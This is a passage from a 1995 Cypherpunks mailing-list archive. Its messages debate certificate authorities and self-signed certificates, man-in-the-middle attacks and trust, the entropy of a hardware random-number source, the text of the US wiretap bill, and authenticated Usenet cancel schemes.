> for a miniscule amount of money, and as many of these as are desired.
> 
> (No, I'm not saying "Verisign" must offer certificates for very low cost,
> only that there be no built-in costs, or built-in time delays and
> processing delays, that would prevent "Tim's Really Cheap and No Questions
> Asked Certificate Service" from issuing such certificates, cheaply and
> rapidly (in seconds, or less, as some applications will need this, if other
> services "demand" certificates).

  If you take a look at verisign's home page, they will be offering
"low assurance" certificates for free for non-commercial uses.  The
only thing they will guarantee about these certs is that the subject
name in the certificate is unique across all certificates signed
by their class I CA.  You should be able to get one of these
certs in real time via an HTML form.

> 2. "...software lets the user decide which CAs they will accept
> certificates from?"
> 
> Fine, provided the following CAs are acceptable:
> 
> -- an "automatic" certificate granter, essentially meant only to satisfy
> protocols which require certificates
> 
> -- a certifier for the Mob, which sells certificates for some fee
> 
> -- the application itself should be able to generate certificates
> immediately...call this the "null certification."
> 
> It is true that some of these example seem to "undermine" the whole purpose
> of certificates, but this is precisely my point: if I want a key to be
> certified, I will determine the conditions under which I want it to be
> certified. Other parties are free to meet my conditions if they wish to do
> business with me, or not, as the case may be.

  Anyone is free to set up a CA.  In Netscape Navigator 2.0 the
user can decide which CAs they want to accept certs from, or just
mark individual certs as "trusted" no matter what CA they were
signed by.  If you the user choose to trust a CA run by the Mob,
then thats your business.

> The "null certification" is thus very important.
> 
> Naturally, I think this null certification makes the idea of _requiring_
> certification moot.
> 
> Will Netscape allow this?

  I assume that by "null certification" you mean self-signed
certificate.  As I said above, the user can choose to accept
any certificate they want, independent of who signed it.  If you
tell netscape that you want to accept "joe's" certificate for
the purposes of encrypted e-mail, then we don't care who signed
it.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 6 Oct 95 00:35:14 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
Message-ID: <199510060735.AAA22195@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 PM 10/5/95 -0400, Adam Shostack <adam@homeport.org> wrote:
>	The key does indeed have a high likelihood of being unique,
>but dealing with 1024 bit identifiers could strain database systems,
>especially when 100 well chosen bits would be than enough.

If everybody in the world has a 1024-bit key, that's 750 GB;
that's not bad at all by the time everybody in the world would have one,
and you could do MD5s in about 100 GB, which is a little more convenient.
Today, for 750 GB, you'd probably have tape in your system, or optical jukebox.
But not everybody has one; on the other hand, I suppose individuals
in well-heeled countries might end up with dozens of their own.

On the other hand, the number of 1024-bit primes is something like
2^1023/log(2^1024) (if I remember right), or roughly 2^1013.
The probability of two independent uniformly distributed primes
matching is about 2^1023/2^32, which is still an astoundingly
mindbogglingly LARGE number.  If you've got 1024 bits of entropy
in your input process, there will not _be_ any matches.
(If people insist on using sources of randomness like clocks or
user names, the chances are a lot higher....)

Now, for 128-bit hashes, whether it's MD5 or just the near-bottom 128 key bits,
by the time you get 2^64 of them together, you've got a 50% chance of a match.
Not a problem, since you'll not likely need that many, even for the 2^33 people
in the world.  Still not a problem.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Fri, 6 Oct 95 00:36:09 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <v02110109ac9a8c6cf466@[204.179.132.4]>
MIME-Version: 1.0
Content-Type: text/plain


An NNTP v2 protocol specification effort is underway in the IETF now.
Strictly to clean up existing extended practice - not to do new things.

Erik Fair







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 6 Oct 95 00:56:14 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Certificates, Attributes, Web of Trust
In-Reply-To: <3074DAAB.3D62@netscape.com>
Message-ID: <Pine.SUN.3.91.951006005515.20417B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Oct 1995, Jeff Weinstein wrote:
 
>   If you take a look at verisign's home page, they will be offering
> "low assurance" certificates for free for non-commercial uses.  The
> only thing they will guarantee about these certs is that the subject
> name in the certificate is unique across all certificates signed
> by their class I CA.  You should be able to get one of these
> certs in real time via an HTML form.
 
What is the point of this?  What is to prevent someone from
getting certificates for a million of the most common and/or famous names
as quickly as possible?
 
Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 6 Oct 95 03:28:38 PDT
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Simple Hardware RNG Idea
Message-ID: <ac9ab28c02021004ba9d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 PM 10/5/95, Simon Spero wrote:
>On Thu, 5 Oct 1995, Norman Hardy wrote:
....
>> You presumably use the oddness of the count for your random bit in some
>> predetermined time interval. External radiation can change, but not bias
>> the parity. If the counter saturates, the counter may be biased towards one
>
>Hmmm. But isn't this method slightly biased? If the probability of  N
>events < the probability of N+1 events, wouldn't you need a large number
>of events per bit to make the bias insignificant?
....
What you really need is entropy (information). I propose concatenating
several counts and sending them thru MD5. The counts are distributed the
same way but are independent so that the entropy of the concatenation is
the sum of the entropies. Each count has a Poisson distribution. That tells
you how many bits of entropy there are in the input to the MD5. Take that
many bits, rounded down, as your random bits.

If there are an average of x bits in a time interval then the probability
that the count will be exactly K is (x^K/(K!))exp(-x). That is the Poisson
distribution. The entropy is then:

- sum[i=0 to infinity]  (x^K/(K!))exp(-x)log( (x^K/(K!))exp(-x))
= - sum[i=0 to infinity] (x^K/(K!))exp(-x)(log(x^K/(K!)) - x)
= - sum[i=0 to infinity] (x^K/(K!))exp(-x)(K*log(x) - log(K!) - x)

Here is a klutzy Scheme program to evaluate these:
(define (sum g)(letrec ((ss (lambda (n)
         (if (= n 0) (g 0) (+ (g n) (ss (- n 1)))))))
           (ss 30)))
(define (log2 x)(/ (log x)(log 2)))
(define (fact n)(if (= n 0) 1 (* n (fact (- n 1)))))
(define (p x k) (* (/ (expt x k)(fact k))(exp (- x))))
(define (en n)(sum (lambda(x) (let ((c (p x n)))
  (if (= c 0) 0 (* c (log2 c)))))))

(en 1) => 2.07
(en 3) => 2.92
(en 10) => 3.73
(en 15) => 4.0


I.e. if 1 count is expected on average there are two bits of entropy
in the count (supprising!) and if the count averages 10 then there
are 3.7 bits worth. It goes up as the log.

Before you bet your enterprise on this scheme consider that the math
was done at 03:30 AM.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 6 Oct 95 07:20:44 PDT
To: perry@piermont.com
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
Message-ID: <199510061420.HAA13735@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:02 PM 10/5/95 -0400, Perry E. Metzger wrote:
>
>"James A. Donald" writes:
> > They want to rule over us.  [...] There is no commonality of
> > purpose, hence no possibility of cooperation.   

At 05:02 PM 10/5/95 -0400, Perry E. Metzger wrote:
> I disagree. Most NSA types are probably stock government employees 
> who want to get their job done with the least muss and fuss. 
> 
> [...]
>
> I don't think the NSA is inherently the enemy at all. Signals 
> intelligence and protecting the U.S. and its citizens from signals 
> intelligence is probably necessary. 

Naturally members of an organization wish the organization to become 
great and powerful:  A great and powerful Netscape would be a 
Microsoft.  A great and powerful NSA would be a KGB or an SS.

Naturally everyone likes their job to meaningful, everyone likes 
their job to have an impact.  Everyone wants to be important.  If the 
NSA are eyes without hands, they are impotent, they are useless.  So 
they want hands.  They want information about us to be used by the 
government, which means they want the government to exercise detailed 
control over us in response to their detailed information about us.

Our function lust would, if fulfilled, give us only moderate 
satisfaction, their function lust, if fulfilled, would give them 
vast power, and hence vast satisfaction.

Our function lust, if fullfilled, would give us more power over computers. 
Their function lust, if fullfilled, would give them more power over us.

> However, in general, what you are looking at is just the
> result of an entity trying to preserve itself having access to
> governmental force. I doubt that there are many "national domination"
> types in the agency, 

Despite grandstanding by the republicans, no government agency has ever
been closed down, or suffered layoffs, merely because its function became 
completely obsolete.  (Though some have suffered renamings and reshuffles, 
and some have been allowed to shrink through natural attrition)

The guys who used to control prices in the trucking industry now work 
full time regulating each other.  (I kid you not)  We are still stockpiling
helium to lift a fleet of dirigibles for world war one.  (Like Dave Barry, 
I am not making this up, though the Republicans have planned to close down 
the helium agency.)

Job preservation is irrelevant:  They are government employees.  
Power is the issue.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Oct 95 07:34:50 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <199510061433.HAA04187@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:

>hfinney@shell.portal.com writes:
> > There is a difference between a MITM and the case you describe where you
> > are actually communicating securely with the person you think you are,
> > but he chooses to relay the messages around.  

>Seems to me that the idea of "communicating with the person you think
>you are" is intractably difficult if you're not sitting in the same
>room.  If you accept instead the idea of "communicating with the
>entity possessing the private half of a keypair" then life gets a lot
>simpler. 

I can certainly agree with the attractive simplicity of this notion.  My
point is that it is practically useless.  I believe this is a seductive
but very wrong idea.  As I said, it amounts to defining the problem away.
Does that mean that the problem (of MITM attacks) never existed at all,
that all of the effort that people have spent over the year to try to
solve it was wasted?  I am baffled by the fact that people are taking
this whole notion of "communicating with keys" seriously.  Keys do not
communicate.

One might as easily say that wiretaps are not an issue: I am not
communicating with the person I called, but with the other end of the
telephone wire.  If that wire end is actually (unknown to me) in the
hands of a government agent who has cut the wire and interposed his own
listening device, that's OK, because I'm still communicating with the
other end of the wire.  After all, I have no way of knowing whether the
person that I am talking to may actually be spreading my info to
anyone, so it doesn't really make any difference if he does it or the
wiretappers.  Etc., etc.  This is exactly like the argument about
communicating with keys.  Does this mean that we shouldn't worry about
wiretaps?  I hope not.  I really don't understand why the argument is
so much more persuasive in the case of keys.

> >                                               The difference is that if
> > you are actually communicating securely with an individual, you can form
> > some estimate of his personality, judgement, etc.  You may choose on this
> > basis to trust him, provide sensitve information, take risks, and so on.
> > But if he is actually behind a MITM then all bets are off. 

>I don't see why.  If, via some MITM (or "EITM", "Entity In The
>Middle") you are able to form a trust relationship with a public key,
>then I can see no practical difference.  Consider a dating advice
>service that's behind a public key.  You send it dozens of letters,
>and soon come to trust the advice being given.  By whatever means at
>your disposal you look for leaks of information you divulge and find
>none, so your trust increases.  If the private key is held by an AI
>program, by a team of learned specialists at a shadowy Swedish
>research institute, or by Rush Limbaugh, then what difference does it
>make to you?

The difference is that I form a judgement about the personality of the
person I am communicating with, whereas I can't form any such judgement
about the personality of the MITM.  Consider how, in life, we decide who
to trust.  Isn't it largely on the basis of communications?  We talk to
the person, we talk to other people about him, we take what we know of
him, and we decide to trust him.  If we suppose that there is in fact a
secure channel to another person, then I suggest that it is plausible to
suppose that we could enter into a trusted relationship with him, even
without a face-to-face meeting.  After all, what exactly does the face to
face meeting accomplish?  Yes, we see a little more about the person, we
can judge some non-verbal communications.  But it is not wholly
different.

We can always be wrong - the person may not be as trustworthy as we think
he is.  There is some probability of that which we must always keep in
mind.  But, and here is my main point, if a MITM is a possibility (and
we're taking the attitude that that's just fine, we're communicating with
keys, no problem if there's a MITM involved, don't bother to take any
steps to prevent it) then these assumptions about extending trust are a
lot riskier.  The probability of a betrayal will be much higher if a MITM
is possibly involved than if he is not.  Most people do not try to betray
their communicants.  But if (in the worst case) all lines were tapped by
men in the middle, then in fact all conversations are subject to this
betrayal.  As I wrote before, I don't see the difference between this
situation and one where there is no security at all (at least from
wiretappers).

> > All of your judgement about him is irrelevant.  At any time the
> > MITM can take advantage of the information you provide.  He can
> > even "blow his cover" and take extreme action, to your detriment.

>But then so can the "real person" you thought you were communicating
>with.

Most of the time your judgement about the real person will be valid, at
least with some experience.  Most people are not AI's or teams of
conspirators.  But you have absolutely no basis to make judgements about
the MITM.  In fact the greater probability is that his interests are
opposed to yours.

> > This situation with the MITM is actually about the same as if you were
> > communicating insecurely in the first place.  You are exposed to all of
> > the same risks.

>The only way to achieve the level of security offered by physical face
>to face communication with a person is to have a physical face to face
>conversation at some point.  If you only ever communicate via
>electronic means, you are always subject to the risk of dealing with a
>synthetic entity.  (I think.)

I don't think so, or at least the risk can be minimized much more than in
the model where we just say that we're communicating with keys, therefore
a MITM is perfectly legitimate because it's just a matter of who holds
the keys.  Suppose I want to talk to PC Magazine columnist John Dvorak.
Suppose I find a VeriSign certificate for his key, with his name and
employment information.  I've never met him.  We've never had a face to
face conversation.  Yet I claim I can communicate with considerable
security with Dvorak using this certificate, certainly more than if I
just use any old key which is lying around with his name on it, one which
may be owned by a MITM.

> > So if you are willing to accept communicating systems that allow this
> > kind of attack, you almost might as well not use cryptography at all.
> > (Not quite, because the MITM is a more expensive attack to mount than one
> > on an unsecured wire.)

>That's not clear.  I can have confidence when using a PK scheme that I
>am at least communicating securely with the entity that holds the
>private key.  That that entity may be leaking information through
>alternate channels is something I don't know; I don't see how you can
>securely defend against that in any case, or perhaps I don't see how
>defending against it in the case that you think you know who you're
>dealing with is any different than defending against it if you accept
>that you don't know who you're dealing with.

>(I've read over that a couple times, and I think it's OK.)

If you are in fact communicating with the person you think you are, you
can use all the information you have about him (including other
conversations) to judge his personality and trustworthiness.  Yes, this
can be mistaken - but the same thing happens in the real world.  That
doesn't mean that we abandon the whole idea of trust.  We still can be
right most of the time.  However if you know that a MITM may be involved,
you will be much slower to extend trust.  In fact you have to act as
though you have an unsecured channel.

> > All of your messages are by definition going to the communicatee
> > with whom you are communicating.  If the particular communicatee
> > who is receiving your message chooses to relay it or spread the
> > information around in other ways, that is the right and privilege
> > of the communicatee.  But messages are going to the communicatee
> > they are going to, whether encryption is used or not.  So
> > encryption is not necessary. 

>Ah, but that last point is clearly *not* true.  When you encrypt, you
>at least have some assurance that between you and the communicatee
>there's security.  If (unfortunately) the "comminicatee" is a
>conspiracy that begins at the CO where your home phone lines
>terminate, then indeed you've got a problem.

No, by definition the "communicatee" is the set of all the people who
see your messages.  So by definition between you and the communicatee
there is security even without encryption (since no one other than the
communicatee sees the message).  Sophistry?  The number of people who can
receive your messages is no greater without encryption than if you use
encryption but don't take steps against a MITM and in fact adopt a stance
which states that MITM attacks don't exist.

> > This argument seems to mirror the one for why we only communicate with
> > keys, that if a key wants to do something nasty we can't stop it (him?),
> > etc.  I say, we don't communicate with keys.  We communicate with people
> > (or occasionally programs).

>But how do you know?  (How do you know there aren't a team of people
>standing beside me advising me on what to type?)  And note that you
>can hardly keep me from doing something nasty: to prove it, I'm going
>to get up right now and fetch my favorite beverage, which is a 6oz can
>of cranberry juice mixed with a 12oz can of Diet Coke :-)

I don't know for sure, but if you tell me or give me the impression over
a period of time that you are keeping our conversations private, and I
decide that you are honest based on our conversations and what I know
about you from others, then I can make a judgement with a reasonable
chance of safety.  Yes, I can be mistaken.  But that doesn't mean that I
should abandon the whole idea of trust.  Otherwise I will never trust
anybody in any part of life.  But preventing MITM attacks is very
important to being able to extend trust in the online world.  Defining
them away is not a satisfactory solution.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 6 Oct 95 07:35:55 PDT
To: cypherpunks@toad.com
Subject: Where is text of wiretap bill
Message-ID: <199510061435.HAA16061@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Did the wiretap bill, as passed, contain those magic words:
"or other legal authority"?

Where can I get the text of the wiretap bill?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 6 Oct 95 05:37:29 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <9510061236.AA25892@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > There is a difference between a MITM and the case you describe where you
 > are actually communicating securely with the person you think you are,
 > but he chooses to relay the messages around.  

Seems to me that the idea of "communicating with the person you think
you are" is intractably difficult if you're not sitting in the same
room.  If you accept instead the idea of "communicating with the
entity possessing the private half of a keypair" then life gets a lot
simpler. 

 >                                               The difference is that if
 > you are actually communicating securely with an individual, you can form
 > some estimate of his personality, judgement, etc.  You may choose on this
 > basis to trust him, provide sensitve information, take risks, and so on.
 > But if he is actually behind a MITM then all bets are off. 

I don't see why.  If, via some MITM (or "EITM", "Entity In The
Middle") you are able to form a trust relationship with a public key,
then I can see no practical difference.  Consider a dating advice
service that's behind a public key.  You send it dozens of letters,
and soon come to trust the advice being given.  By whatever means at
your disposal you look for leaks of information you divulge and find
none, so your trust increases.  If the private key is held by an AI
program, by a team of learned specialists at a shadowy Swedish
research institute, or by Rush Limbaugh, then what difference does it
make to you?

 > All of your judgement about him is irrelevant.  At any time the
 > MITM can take advantage of the information you provide.  He can
 > even "blow his cover" and take extreme action, to your detriment.

But then so can the "real person" you thought you were communicating
with.

 > This situation with the MITM is actually about the same as if you were
 > communicating insecurely in the first place.  You are exposed to all of
 > the same risks.

The only way to achieve the level of security offered by physical face
to face communication with a person is to have a physical face to face
conversation at some point.  If you only ever communicate via
electronic means, you are always subject to the risk of dealing with a
synthetic entity.  (I think.)

 > So if you are willing to accept communicating systems that allow this
 > kind of attack, you almost might as well not use cryptography at all.
 > (Not quite, because the MITM is a more expensive attack to mount than one
 > on an unsecured wire.)

That's not clear.  I can have confidence when using a PK scheme that I
am at least communicating securely with the entity that holds the
private key.  That that entity may be leaking information through
alternate channels is something I don't know; I don't see how you can
securely defend against that in any case, or perhaps I don't see how
defending against it in the case that you think you know who you're
dealing with is any different than defending against it if you accept
that you don't know who you're dealing with.

(I've read over that a couple times, and I think it's OK.)

 > In fact, I can facetiously prove that cryptography is unnecessary.  We
 > are not communicating with individuals, but with communicatees.  

Works for me.  (Indeed, Hal, I have no idea who or what your are :-)

 > All of your messages are by definition going to the communicatee
 > with whom you are communicating.  If the particular communicatee
 > who is receiving your message chooses to relay it or spread the
 > information around in other ways, that is the right and privilege
 > of the communicatee.  But messages are going to the communicatee
 > they are going to, whether encryption is used or not.  So
 > encryption is not necessary. 

Ah, but that last point is clearly *not* true.  When you encrypt, you
at least have some assurance that between you and the communicatee
there's security.  If (unfortunately) the "comminicatee" is a
conspiracy that begins at the CO where your home phone lines
terminate, then indeed you've got a problem.

 > This argument seems to mirror the one for why we only communicate with
 > keys, that if a key wants to do something nasty we can't stop it (him?),
 > etc.  I say, we don't communicate with keys.  We communicate with people
 > (or occasionally programs).

But how do you know?  (How do you know there aren't a team of people
standing beside me advising me on what to type?)  And note that you
can hardly keep me from doing something nasty: to prove it, I'm going
to get up right now and fetch my favorite beverage, which is a 6oz can
of cranberry juice mixed with a 12oz can of Diet Coke :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 6 Oct 95 04:58:10 PDT
To: cypherpunks@toad.com
Subject: FON_tap
Message-ID: <199510061158.HAA17199@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


10-6-95. WSJaper has a report on the global rise of unions 
between banks and telcos for exploiting electronic 
marketecture.


Quotes:


"Being in partnership with these phone people is like shooting 
adrenalin into your veins," gushes one banker who recently 
invested in the national phone company.


"Bricks and mortar won't do it," says another banker, "you have 
to drive down the transaction cost."


FON_tap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Fri, 6 Oct 95 08:17:23 PDT
To: cypherpunks@toad.com
Subject: Graphic encryption
Message-ID: <199510061517.IAA10725@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I am currently working for a company that has a graphic encryption 
product called PrivaSoft. I was wondering if there were other products 
or engines that also provide graphic encryption. (graphic encryption is 
the use of a encryption algorythm to scramble an image taken of a 
document.) 
 
Also if any of ya'll are famillar with graphic encryption, I am looking 
for opinions as to its strengths / weaknesses.


Steve O.
Mgr. Tech. Services
*************************************************
PrivaSoft TM                                    *
1877 Springfield Ave PO BOX 600                 *
 Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 6 Oct 95 08:24:55 PDT
To: cypherpunks@toad.com
Subject: Re: Where is text of wiretap bill
In-Reply-To: <199510061435.HAA16061@blob.best.net>
Message-ID: <199510061524.IAA02409@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "James A. Donald" <jamesd@echeque.com> writes:
> Did the wiretap bill, as passed, contain those magic words:
> "or other legal authority"?

Yes, it does, repeatedly.

          SEC. 103. ASSISTANCE CAPABILITY REQUIREMENTS.
            (a) Capability Requirements: Except as provided in subsections
          (b), (c), and (d) of this section and sections 108(a)  and 109(b)
          and (d), a telecommunications carrier shall ensure that its
          equipment, facilities, or services that provide a customer or
          subscriber with the ability to originate, terminate, or direct
          communications are capable of--
                (1) expeditiously isolating and enabling the government,
              pursuant to a court order or other lawful authorization, to
              intercept, to the exclusion of any other communications, all
              wire and electronic communications carried by the carrier
...
                (2) expeditiously isolating and enabling the government,
              pursuant to a court order or other lawful authorization, to
              access call-identifying information that is reasonably
              available to the carrier--
...
                (3) delivering intercepted communications and
              call-identifying information to the government, pursuant to a
              court order or other lawful authorization, in a format such
              that they may be transmitted by means of equipment, facilities,
...
          SEC. 105. SYSTEMS SECURITY AND INTEGRITY.
            A telecommunications carrier shall ensure that any interception
          of communications or access to call-identifying information
          effected within its switching premises can be activated only in
          accordance with a court order or other lawful authorization and
          with the affirmative intervention of an individual officer or

> Where can I get the text of the wiretap bill?

From the Library of Congress' "Thomas" server: http://thomas.loc.gov/
Look for either SB 2375 (Senate) or HR 4922 (House).

An assistant director of the FBI, William Baugh, spoke recently at the ICI
conference in DC.  He said he hoped American industry would be cooperative
in making the voluntary compliance with TESSERA or other GAK widespread,
because if it doesn't happen then they would need to come back and get
more Congressional action, and "we found the coercive solution we had to
use for Digital Telephony very draining."

If <that> doesn't get them your sympathy, what will?

	Jim Gillogly
	Sterday, 15 Winterfilth S.R. 1995, 15:18




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 6 Oct 95 05:40:46 PDT
To: cypherpunks@toad.com
Subject: Trust company banks on Internet
Message-ID: <v02120d01ac9ad40382ab@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Fri, 6 Oct 95 08:10:41 -0400
From: "GORD JENKINS" <jenkins@fox.nstn.ca>
X-Minuet-Version: Minuet1.0_Beta_14.1
Reply-To: <JENKINS@fox.nstn.ca>
X-Popmail-Charset: English
To: www-buyinfo@allegra.att.com
Subject: Trust company banks on Internet

First Internet Banker  ??  !!

Check out
http://www.bayshore.com

>From the Toronto Globe and Mail page B 1
       Fri 6 Oct 95
"Bayshore set to become first Internet banker  -
Trust promises approval in as little as two minutes"

>From the Ottawa Citizen Page B7 Fri 6 Oct 95

 " Trust company banks on Internet -Financial shopping
in cyberspace arrives in Canada next week with the first
intractive banking sevice on the Internet. Analysts say there
is a lot more coming soon.
Bayshore Trust Co.plans to take applcations for loans up
to $15,000 and orders for guaranteed investment certificates
directly from customers on the World Wide Web"
Gordon Jenkins
jenkins@fox.nstn.ca
http://www.infop.com/karoma
 --
 GORD JENKINS
e maik  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 6 Oct 95 09:44:09 PDT
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <199510051540.IAA23612@ix.ix.netcom.com>
Message-ID: <g7VJcD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


[A quick last word before I leave for a wilderness area with no net.access.]

In article <199510051540.IAA23612@ix.ix.netcom.com>, Bill Stewart
<stewarts@ix.netcom.com> writes:
[Hujskonen-Franz]
>Aside from the forged-From:-bogus-cancel spam /r$ proposed, this has
>the problem that it still only allows the originator to cancel a message,
>and not either the moderator of a moderated group or a Good Spam-canceller
>like CancelMoose, as well as stopping censors and cancel-spammers.

The respected CancelMoose no longer posts cancels, but posts PGP-signed NoCeM
notices. In fact, CancelMoose's web site has some nice things to say about the
Hujskonen-Franz proposal. I quote URL: http://www.cm.org/about-cancels.html:

]About Cancels
]*************
]
]A number of people have asked about the relationship between this project
]and spam cancels. IMHO, the point is moot.
]
]I envision unauthenticated cancel messages will rapidly become obsolete,
]once people start posting menu driven cancelbots. If we want cancels back
]we'll have to authenticate them.
]
]Taneli Huuskonen first suggested this scheme to me, and I think it's an
]excellent idea.
]
]For every posted message there is a "Cancel-Key" which is the message-id of
]the message hashed with a secret password. The MD5 of the cancel-key is the
]"Cancel-Challenge" which is posted as a header in every post you make. To
]cancel that post, the cancel message must have a copy of the Cancel-Key in
]the headers. An admin can configure his news software to add another
]Cancel-Challenge to the post, if he/she wishes to retain the rights to
]cancel it. The only people this leaves out in the cold is the moderators--
]this does not allow them to protect their newsgroup-- perhaps a public key
]based system to "prove" moderation will prove necessary, but that will
]require some MAJOR reworkings of news...
]
]Email: moose@cm.org

I urge cypherpunks to read the NoCeM information on URL http://www.cm.org/ and
to jump on the NoCeM bandwagon (such as, start posting PGP-signed "show"
ratings for articles we find worth highlighting).

I see nothing in RFC 1036 that says that a moderator of a newsgroup should be
able to cancel other people's posts in his/her group. There's an old Usenet
tradition (bad, IMO) that when Alice posts an article in Bob's moderated group
and inserts her own "Approved:" header, then Bob is expected to impersonate
Alice and to post a cancel in Alice's name for the unauthorized article. But,
at present, nothing prevents some Charlie from impersonating Bob impersonating
Alice and forging a cancel for an article that actually was approved by Bob.

Basically, if Alice posts an article with her own "Approved:" header in Bob's
newsgroup, then this problem is not going to be solved by just cancelling her
article(s). If Alice keeps doing that, it becomes necessary to talk to her
feeds about aliasing her site, and the cancels have little to do with it.

IMVHO, only the author should be able to cancel her own postings in a moderated
group. If the posting was not properly approved, she should cancel them to show
good will. Once Bob has _approved Alice's posting in his moderated group, he
shouldn't be able to impersonate Alice to cancel it, but should ask Alice.

(And all this can be done with the Hujskonen-Franz scheme.)

Bob can instead protect his newsgroup by posting a PGP-signed NoCeM notice:
 Action: hide
 Type: unauthorized posting
or by asking someone widely trusted, like CM, to post such a notice.

Likewise when Brad Templeton and/or Co$ (sorry Brad for lumping you together :)
see an article which they think quotes their copyrighted material, they should
not forge a cancel, but post a PGP-signed NoCeM notice:
 Action: hide
 Type: copyright violation
I wonder how many sites would honor CancelPoodle's NoCeM notices? :)

The Hujskonen-Franz scheme would still allow Clarinet to continue massively
canceling/superseding their own articles.

Continuing to quote Bill Stewart:
>Cancellation is a sufficiently local-policy-dependent issue, and reasonably
>low volume compared to the rest of news, that it probably makes sense for
>the various news programs to hand cancellation requests off to an external
>program, which can be locally modified as desired.

It would be nice if inn and nn called the same external program to handle
cancels. Now nn's database easily gets out of sync.

With an external program, each site could choose to honor only authenticated
cancels and ignore 3rd party NoCeM's (but let the users mark NoCeM'd articles
as read, if they want to); or honor all cancels; or something in between.

>One approach is to add digital signature and verification capability
>to News, at least to support cancels; doing this in an outboard
>cancel-daemon is obviously easier.  RIPEM-SIG is a signature-only
>version of RIPEM which is exportable, probably just in binaries.
>The local cancel-daemon could accept cancellation requests that were signed
>by anybody on the list of locally-approved cancellers; one site could accept
>cancels from Cancelmoose, newsgroup moderators, and Helena Kobrin;
>another could do authors only.  This would, of course, encourage people
>to get their digital signatures out there to allow themselves to cancel
>their own messages.

Any idea that encourages people to use digital signatures is good. However the
Hujskonen-Franz proposal allows a total stranger to post an article to your
news spool; then to cancel this article, with your being reasonable sure that
